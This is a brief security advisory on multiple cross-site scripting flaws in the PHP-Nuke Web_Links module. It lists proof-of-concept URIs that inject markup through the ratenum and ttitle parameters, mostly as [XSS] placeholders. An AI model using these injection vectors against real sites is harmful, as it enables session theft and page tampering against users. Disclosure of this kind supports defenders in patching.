|
PHP-Nuke Web_Links Module Multiple Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept URI's are available: http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=TopRated&ratenum=[XSS]&ratetype=num http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkdetails&ttitle=[XSS] http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkeditorial&ttitle=[XSS] http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=viewlinkcomments&ttitle=[XSS] http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=ratelink&ttitle=[XSS] |
|
|
Privacy Statement |